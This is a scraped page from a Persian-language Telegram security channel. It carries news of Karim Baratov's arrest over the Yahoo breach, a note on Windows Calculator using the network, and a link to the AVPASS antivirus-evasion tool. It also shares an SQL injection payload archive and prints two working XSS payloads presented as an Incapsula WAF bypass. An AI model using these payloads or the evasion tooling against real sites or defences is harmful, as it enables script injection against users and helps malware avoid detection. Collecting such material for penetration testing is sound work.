امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
کریم باراتف هکر روس که متهم شده به هک کردن سیستم های یاهو و سرقت اطلاعات ۵۰۰ میلیون کاربر ، در کانادا دستگیر و به امریکا تحویل داده شد.
در اولین اخبار منتشر شده کریم این هک رو تکذیب کرده.
SQL-Injection-Payloads-master.zip
8.2 KB
پیلود های SQLI برای استفاده در Burp Suite و OWASP Zed Attack Proxy
Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
ماشین حساب ویندوز از اینترنت استفاده میکند!
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.

https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator

#windows
#malware
AVPASS

AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques.

https://github.com/sslab-gatech/avpass

#android
#smartsecurity
#malware
#trojan